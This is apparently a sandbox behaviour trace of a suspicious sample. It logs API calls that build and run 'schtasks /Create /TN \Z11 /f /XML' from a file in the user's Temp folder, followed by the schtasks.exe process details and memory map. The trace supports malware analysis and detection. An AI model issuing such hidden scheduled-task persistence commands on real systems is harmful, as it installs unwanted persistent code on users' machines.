[0216.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\sysnative\\schtasks.exe", cchWideChar=-1, lpMultiByteStr=0x15d620, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\sysnative\\schtasks.exe", lpUsedDefaultChar=0x0) returned 34
[0216.264] _fullpath (in: _FullPath=0x15d920, _Path="C:\\Windows\\sysnative\\schtasks.exe", _SizeInBytes=0x104 | out: _FullPath="C:\\Windows\\sysnative\\schtasks.exe") returned="C:\\Windows\\sysnative\\schtasks.exe"
[0216.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\sysnative\\schtasks.exe", cchWideChar=-1, lpMultiByteStr=0x15d810, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\sysnative\\schtasks.exe", lpUsedDefaultChar=0x0) returned 34
[0216.265] _findfirst64i32 (in: _FileName="C:\\Windows\\sysnative\\schtasks.exe", _FindData=0x15db60 | out: _FindData=0x15db60) returned 0xffffffffffffffff
[0216.266] _errno () returned 0x5321300
[0216.266] VarBstrCmp (bstrLeft="", bstrRight="", lcid=0x0, dwFlags=0x30001) returned 0x1
[0216.266] VarBstrCat (in: bstrLeft=" /Create /TN \\Z11", bstrRight=" /f /XML ", pbstrResult=0x15dd40 | out: pbstrResult=0x15dd40) returned 0x0
[0216.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="temp", cchWideChar=5, lpMultiByteStr=0x15dba0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="temp", lpUsedDefaultChar=0x0) returned 5
[0216.267] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x0, _DstSize=0x0, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf=0x0) returned 0x0
[0216.267] CRetailMalloc_Alloc () returned 0x12b40240
[0216.267] getenv_s (in: _ReturnSize=0x15db08, _DstBuf=0x12b40240, _DstSize=0x25, _VarName="temp" | out: _ReturnSize=0x15db08, _DstBuf="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 0x0
[0216.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=37, lpWideCharStr=0x7466b58, cchWideChar=74 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37
[0216.267] SysReAllocStringLen (in: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz=0x0, len=0x24 | out: pbstr=0x15dad8*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1
[0216.267] CRetailMalloc_Free () returned 0x3010eba011c0401
[0216.267] VarAdd (in: pvarLeft=0x1086ee60, pvarRight=0x1086ee78, pvarResult=0x1086ee18 | out: pvarResult=0x1086ee18) returned 0x0
[0216.267] VarAdd (in: pvarLeft=0x1086ee18, pvarRight=0x1086ef58, pvarResult=0x1086ee00 | out: pvarResult=0x1086ee00) returned 0x0
[0216.268] VarAdd (in: pvarLeft=0x1086ee38, pvarRight=0x1086ef70, pvarResult=0x1086ef90 | out: pvarResult=0x1086ef90) returned 0x0
[0216.268] VarBstrCat (in: bstrLeft="schtasks", bstrRight=" /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", pbstrResult=0x15dcf0 | out: pbstrResult=0x15dcf0) returned 0x0
[0216.268] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="schtasks /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x15dc70*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x15dc50 | out: lpCommandLine="schtasks /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml", lpProcessInformation=0x15dc50*(hProcess=0x7dc, hThread=0x834, dwProcessId=0x1e4, dwThreadId=0x4e8)) returned 1
[0216.291] GetLastError () returned 0x0
[0216.291] WaitForInputIdle (hProcess=0x7dc, dwMilliseconds=0x2710) returned 0xffffffff
[0216.292] CloseHandle (hObject=0x834) returned 1
[0216.292] CloseHandle (hObject=0x7dc) returned 1
[0216.294] SafeArrayDestroyData (psa=0x1086f010) returned 0x0
[0216.294] SafeArrayDestroyData (psa=0x1086efe8) returned 0x0
[0216.294] SafeArrayDestroyData (psa=0x1086efc0) returned 0x0
Thread:
id = 23
os_tid = 0xec8
Thread:
id = 24
os_tid = 0xecc
Thread:
id = 25
os_tid = 0xed0
Thread:
id = 26
os_tid = 0xed4
Thread:
id = 27
os_tid = 0xed8
Thread:
id = 28
os_tid = 0xee0
Thread:
id = 29
os_tid = 0xee4
Thread:
id = 30
os_tid = 0xef0
Thread:
id = 31
os_tid = 0xef4
Thread:
id = 32
os_tid = 0xef8
Thread:
id = 33
os_tid = 0x8e8
Thread:
id = 34
os_tid = 0x750
Thread:
id = 35
os_tid = 0xef8
Thread:
id = 36
os_tid = 0xeb8
Thread:
id = 37
os_tid = 0x660
Thread:
id = 38
os_tid = 0x66c
Process:
id = "2"
image_name = "schtasks.exe"
filename = "c:\\windows\\system32\\schtasks.exe"
page_root = "0x4609a000"
os_pid = "0x1e4"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xe44"
cmd_line = "schtasks /Create /TN \\Z11 /f /XML C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\Z11.xml"
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1042
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1043
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 1044
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 1045
start_va = 0x110000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000110000"
filename = ""
Region:
id = 1046
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1047
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1048
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1049
start_va = 0xffe20000
end_va = 0xffe67fff
monitored = 1
entry_point = 0xffe4966c
region_type = mapped_file
name = "schtasks.exe"
filename = "\\Windows\\System32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")
Region:
id = 1050
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1051
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 1052
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 1053
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 1054
start_va = 0x190000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1055
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1056
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1057
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1058
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1059
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1060
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1061
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1062
start_va = 0x7feff7d0000
end_va = 0x7feff86efff
monitored = 0
entry_point = 0x7feff7d25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1063
start_va = 0x77780000
end_va = 0x77879fff
monitored = 0
entry_point = 0x7779a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1064
start_va = 0x7feff980000
end_va = 0x7feff9e6fff
monitored = 0
entry_point = 0x7feff98b03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1065
start_va = 0x7fefef80000
end_va = 0x7fefef8dfff
monitored = 0
entry_point = 0x7fefef81080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1066
start_va = 0x7fefe120000
end_va = 0x7fefe1e8fff
monitored = 0
entry_point = 0x7fefe19a874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1067
start_va = 0x7fefdf10000
end_va = 0x7fefe112fff
monitored = 0
entry_point = 0x7fefdf33330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1068
start_va = 0x7feffa60000
end_va = 0x7feffb8cfff
monitored = 0
entry_point = 0x7feffaaed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1069
start_va = 0x7feff550000
end_va = 0x7feff626fff
monitored = 0
entry_point = 0x7feff553274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1070
start_va = 0x7feff630000
end_va = 0x7feff6a0fff
monitored = 0
entry_point = 0x7feff641e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1071
start_va = 0x7fefaa30000
end_va = 0x7fefaa39fff
monitored = 0
entry_point = 0x7fefaa3260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1072
start_va = 0xc0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1073
start_va = 0x190000
end_va = 0x28ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 1074
start_va = 0x2d0000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002d0000"
filename = ""
Region:
id = 1075
start_va = 0x3d0000
end_va = 0x557fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003d0000"
filename = ""
Region:
id = 1076
start_va = 0xe0000
end_va = 0x108fff
monitored = 0
entry_point = 0xe1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1077
start_va = 0xe0000
end_va = 0x108fff
monitored = 0
entry_point = 0xe1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1078
start_va = 0x7feff950000
end_va = 0x7feff97dfff
monitored = 0
entry_point = 0x7feff951010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1079
start_va = 0x7feff3d0000
end_va = 0x7feff4d8fff
monitored = 0
entry_point = 0x7feff3d1064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1080
start_va = 0x560000
end_va = 0x6e0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1081
start_va = 0x6f0000
end_va = 0x1aeffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006f0000"
filename = ""
Region:
id = 1082
start_va = 0xe0000
end_va = 0xf1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "schtasks.exe.mui"
filename = "\\Windows\\System32\\en-US\\schtasks.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\schtasks.exe.mui")
Region:
id = 1083
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 1084
start_va = 0xd0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 1085
start_va = 0x100000
end_va = 0x100fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 1087
start_va = 0x7fefc990000
end_va = 0x7fefc99bfff
monitored = 0
entry_point = 0x7fefc991064
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1088
start_va = 0x1af0000
end_va = 0x1dbefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1089
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1090
start_va = 0x1dc0000
end_va = 0x1e3cfff
monitored = 0
entry_point = 0x1dccec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1091
start_va = 0x7fefd6c0000
end_va = 0x7fefd6cefff
monitored = 0
entry_point = 0x7fefd6c1010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1092
start_va = 0x7fefc120000
end_va = 0x7fefc175fff
monitored = 0
entry_point = 0x7fefc12bbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1093
start_va = 0x1dc0000
end_va = 0x1eaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001dc0000"
filename = ""
Region:
id = 1094
start_va = 0x1eb0000
end_va = 0x1f8efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001eb0000"
filename = ""
Region:
id = 1095
start_va = 0x7fefdef0000
end_va = 0x7fefdf0efff
monitored = 0
entry_point = 0x7fefdef60e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1096
start_va = 0x1ff0000
end_va = 0x206ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 1097
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 1098
start_va = 0x7feff870000
end_va = 0x7feff94afff
monitored = 0
entry_point = 0x7feff890760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1099
start_va = 0x290000
end_va = 0x290fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 1100
start_va = 0x7fefde50000
end_va = 0x7fefdee8fff
monitored = 0
entry_point = 0x7fefde51c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1101
start_va = 0x2a0000
end_va = 0x2a0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002a0000"
filename = ""
Region:
id = 1102
start_va = 0x7fefb530000
end_va = 0x7fefb656fff
monitored = 0
entry_point = 0x7fefb5310ec
region_type = mapped_file
name = "taskschd.dll"
filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll")
Region:
id = 1103
start_va = 0x7fefd690000
end_va = 0x7fefd6b4fff
monitored = 0
entry_point = 0x7fefd699658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Thread:
id = 39
os_tid = 0x4e8
[0218.966] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f950 | out: lpSystemTimeAsFileTime=0x18f950*(dwLowDateTime=0x9aaef280, dwHighDateTime=0x1dab598))
[0218.966] GetCurrentProcessId () returned 0x1e4
[0218.966] GetCurrentThreadId () returned 0x4e8
[0218.966] GetTickCount () returned 0x13fff2c
[0218.966] RtlQueryPerformanceCounter (in: lpPerformanceCount=0x18f958 | out: lpPerformanceCount=0x18f958*=2109966367191) returned 1
[0219.091] GetModuleHandleW (lpModuleName=0x0) returned 0xffe20000
[0219.091] __set_app_type (_Type=0x1)
[0219.091] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffe4972c) returned 0x0
[0219.092] __wgetmainargs (in: _Argc=0xffe61240, _Argv=0xffe61250, _Env=0xffe61248, _DoWildCard=0, _StartInfo=0xffe6125c | out: _Argc=0xffe61240, _Argv=0xffe61250, _Env=0xffe61248) returned 0
[0219.214] _onexit (_Func=0xffe52ab0) returned 0xffe52ab0
[0219.214] _onexit (_Func=0xffe52ac4) returned 0xffe52ac4
[0219.214] _onexit (_Func=0xffe52afc) returned 0xffe52afc
[0219.215] _onexit (_Func=0xffe52b58) returned 0xffe52b58
[0219.215] _onexit (_Func=0xffe52b80) returned 0xffe52b80
[0219.215] _onexit (_Func=0xffe52ba8) returned 0xffe52ba8
[0219.215] _onexit (_Func=0xffe52bd0) returned 0xffe52bd0
[0219.216] _onexit (_Func=0xffe52bf8) returned 0xffe52bf8
[0219.216] _onexit (_Func=0xffe52c20) returned 0xffe52c20
[0219.216] _onexit (_Func=0xffe52c48) returned 0xffe52c48
[0219.217] _onexit (_Func=0xffe52c70) returned 0xffe52c70
[0219.358] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0219.385] WinSqmIsOptedIn () returned 0x0
[0219.496] GetProcessHeap () returned 0x2d0000
[0219.496] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebb20
[0219.496] SetLastError (dwErrCode=0x0)
[0219.496] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x2, Condition=0x3) returned 0x8000000000000018
[0219.497] VerSetConditionMask (ConditionMask=0x8000000000000018, TypeMask=0x1, Condition=0x3) returned 0x800000000000001b
[0219.497] VerSetConditionMask (ConditionMask=0x800000000000001b, TypeMask=0x20, Condition=0x3) returned 0x800000000001801b
[0219.497] VerifyVersionInfoW (in: lpVersionInformation=0x18f110, dwTypeMask=0x3, dwlConditionMask=0x800000000001801b | out: lpVersionInformation=0x18f110) returned 1
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.497] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebb40
[0219.497] lstrlenW (lpString="") returned 0
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.497] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x2) returned 0x2ebb60
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.497] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ab0
[0219.497] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebb80
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ae0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b10
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b40
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5b70
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebba0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5ba0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.498] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5bd0
[0219.498] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c00
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c30
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebbc0
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c60
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5c90
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5cc0
[0219.499] GetProcessHeap () returned 0x2d0000
[0219.499] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5cf0
[0219.499] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0219.500] SetLastError (dwErrCode=0x0)
[0219.500] GetProcessHeap () returned 0x2d0000
[0219.500] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5d20
[0219.500] GetProcessHeap () returned 0x2d0000
[0219.500] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5d50
[0219.500] GetProcessHeap () returned 0x2d0000
[0219.500] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5d80
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5db0
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x20) returned 0x2e5de0
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x18) returned 0x2ebbe0
[0219.501] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.501] GetProcessHeap () returned 0x2d0000
[0219.501] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x208) returned 0x2ebd80
[0219.501] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ebd80, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\schtasks.exe" (normalized: "c:\\windows\\system32\\schtasks.exe")) returned 0x20
[0219.502] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefc990000
[0219.506] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoSizeW") returned 0x7fefc9915fc
[0219.506] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", lpdwHandle=0x0 | out: lpdwHandle=0x0) returned 0x744
[0219.508] GetProcessHeap () returned 0x2d0000
[0219.508] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0xc, Size=0x74e) returned 0x2ec350
[0219.508] GetProcAddress (hModule=0x7fefc990000, lpProcName="GetFileVersionInfoW") returned 0x7fefc991614
[0219.508] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\system32\\schtasks.exe", dwHandle=0x0, dwLen=0x74e, lpData=0x2ec350 | out: lpData=0x2ec350) returned 1
[0219.509] GetProcAddress (hModule=0x7fefc990000, lpProcName="VerQueryValueW") returned 0x7fefc9915e0
[0219.509] VerQueryValueW (in: pBlock=0x2ec350, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18f1f8, puLen=0x18f260 | out: lplpBuffer=0x18f1f8*=0x2ec6ec, puLen=0x18f260) returned 1
[0219.512] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.512] _vsnwprintf (in: _Buffer=0x2ebd80, _BufferCount=0x3f, _Format="\\StringFileInfo\\%04x%04x\\InternalName", _ArgList=0x18f1d8 | out: _Buffer="\\StringFileInfo\\040904b0\\InternalName") returned 37
[0219.512] VerQueryValueW (in: pBlock=0x2ec350, lpSubBlock="\\StringFileInfo\\040904b0\\InternalName", lplpBuffer=0x18f268, puLen=0x18f258 | out: lplpBuffer=0x18f268*=0x2ec518, puLen=0x18f258) returned 1
[0219.512] lstrlenW (lpString="schtasks.exe") returned 12
[0219.512] lstrlenW (lpString="schtasks.exe") returned 12
[0219.513] lstrlenW (lpString=".EXE") returned 4
[0219.513] StrStrIW (lpFirst="schtasks.exe", lpSrch=".EXE") returned=".exe"
[0219.514] lstrlenW (lpString="schtasks.exe") returned 12
[0219.515] lstrlenW (lpString=".EXE") returned 4
[0219.515] _memicmp (_Buf1=0x2ebbe0, _Buf2=0xffe21b08, _Size=0x7) returned 0
[0219.515] lstrlenW (lpString="schtasks") returned 8
